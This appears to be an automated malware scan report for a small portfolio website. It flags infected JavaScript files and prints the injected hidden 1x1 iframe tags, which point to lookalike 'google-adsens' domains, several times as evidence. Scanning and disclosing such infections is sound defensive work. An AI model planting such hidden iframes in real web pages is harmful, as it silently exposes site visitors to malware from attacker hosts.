Scanned pages/files
Request | Server response | Status |
http://renatacandeias.net/ | 200 OK Content-Length: 3815 Content-Type: text/html | clean |
http://renatacandeias.net/ndxz-studio/site/js/jquery.js | 200 OK Content-Length: 64457 Content-Type: application/javascript | suspicious |
Hidden iFrame found. size: 1x1 src: http://google-adsenc.com/in.cgi?2 <iframe src="http://google-adsenc.com/in.cgi?2" name="twitter" scrolling="auto" frameborder="no" align="center" height = "1px" width = "1px"> Hidden iFrame found. The same iFrame was found in 10 websites. size: 1x1 src: http://google-adsens.com/in.cgi?2 <iframe src="http://google-adsens.com/in.cgi?2" name="twitter" scrolling="auto" frameborder="no" align="center" height = "1px" width = "1px"> | ||
http://renatacandeias.net/ndxz-studio/site/js/cookie.js | 200 OK Content-Length: 8192 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function move_up() { var move = getCookie('move'); if (move == '') return false; var menu = document.getElementById('menu'); menu.scrollTop = move; } function do_click() { moved = document.getElementById('menu'); moved = moved.scrollTop; setCookie('move', moved, 1); } function getCookie(c_name) { if (document.cookie.length > 0) { c_start = document.cookie.indexOf(c_name + "=") if (c_star Antivirus reports:
Hidden iFrame found. The same iFrame was found in 10 websites. size: 1x1 src: http://google-adsens.com/in.cgi?2 <iframe src="http://google-adsens.com/in.cgi?2" name="twitter" scrolling="auto" frameborder="no" align="center" height = "1px" width = "1px"> Hidden iFrame found. size: 1x1 src: http://google-adsenc.com/in.cgi?2 <iframe src="http://google-adsenc.com/in.cgi?2" name="twitter" scrolling="auto" frameborder="no" align="center" height = "1px" width = "1px"> | ||
http://renatacandeias.net/index.php?/ambientes/tiga/ | 200 OK Content-Length: 5791 Content-Type: text/html | clean |
http://renatacandeias.net/ndxz-studio/site/js/jquery.cycle.all.js | 200 OK Content-Length: 20918 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function($) { $.fn.cycle = function(options) { return this.each(function() { if (options && options.constructor == String) { if (options == 'stop') { if (this.cycleTimeout) clearTimeout(this.cycleTimeout); this.cycleTimeout = 0; return; } options = { fx: options }; } var $cont = $(this), $slides = $cont.children(), els = Antivirus reports:
Hidden iFrame found. size: 1x1 src: http://google-adsenc.com/in.cgi?2 <iframe src="http://google-adsenc.com/in.cgi?2" name="twitter" scrolling="auto" frameborder="no" align="center" height = "1px" width = "1px"> Hidden iFrame found. The same iFrame was found in 10 websites. size: 1x1 src: http://google-adsens.com/in.cgi?2 <iframe src="http://google-adsens.com/in.cgi?2" name="twitter" scrolling="auto" frameborder="no" align="center" height = "1px" width = "1px"> | ||
http://renatacandeias.net/index.php?/ambientes/camara-municipal-do-cartaxo/ | 200 OK Content-Length: 5188 Content-Type: text/html | clean |
http://renatacandeias.net/index.php?/ambientes/papelaria-rossio/ | 200 OK Content-Length: 4728 Content-Type: text/html | clean |
http://renatacandeias.net/index.php?/ambientes/imporelectronica/ | 200 OK Content-Length: 5333 Content-Type: text/html | clean |
http://renatacandeias.net/index.php?/ambientes/pitanga---acessorios/ | 200 OK Content-Length: 5027 Content-Type: text/html | clean |
http://renatacandeias.net/index.php?/ambientes/galrar-contabilidade/ | 200 OK Content-Length: 4755 Content-Type: text/html | clean |
http://renatacandeias.net/index.php?/graphic/griot/ | 200 OK Content-Length: 4180 Content-Type: text/html | clean |
http://renatacandeias.net/index.php?/graphic/vania-duarte/ | 200 OK Content-Length: 4184 Content-Type: text/html | clean |
http://renatacandeias.net/index.php?/ilustrations/scientific-illustrations/ | 200 OK Content-Length: 4210 Content-Type: text/html | clean |
http://renatacandeias.net/index.php?/ilustrations/graphic-diaries/ | 200 OK Content-Length: 4425 Content-Type: text/html | clean |
http://renatacandeias.net/index.php?/ilustrations/doodles/ | 200 OK Content-Length: 5213 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: renatacandeias.net
Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 16 Apr 2014 14:23:15 GMT
Server: nginx
Vary: Accept-Encoding
Content-Type: text/html
X-Powered-By: PleskLin
GET / HTTP/1.1
Host: renatacandeias.net
Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 16 Apr 2014 14:23:15 GMT
Server: nginx
Vary: Accept-Encoding
Content-Type: text/html
X-Powered-By: PleskLin
Second query (visit from search engine):
GET / HTTP/1.1
Host: renatacandeias.net
Referer: http://www.google.com/search?q=renatacandeias.net
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: renatacandeias.net
Referer: http://www.google.com/search?q=renatacandeias.net
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=renatacandeias.net
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://renatacandeias.net/
Result: renatacandeias.net is not infected or malware details are not published yet.
Result: renatacandeias.net is not infected or malware details are not published yet.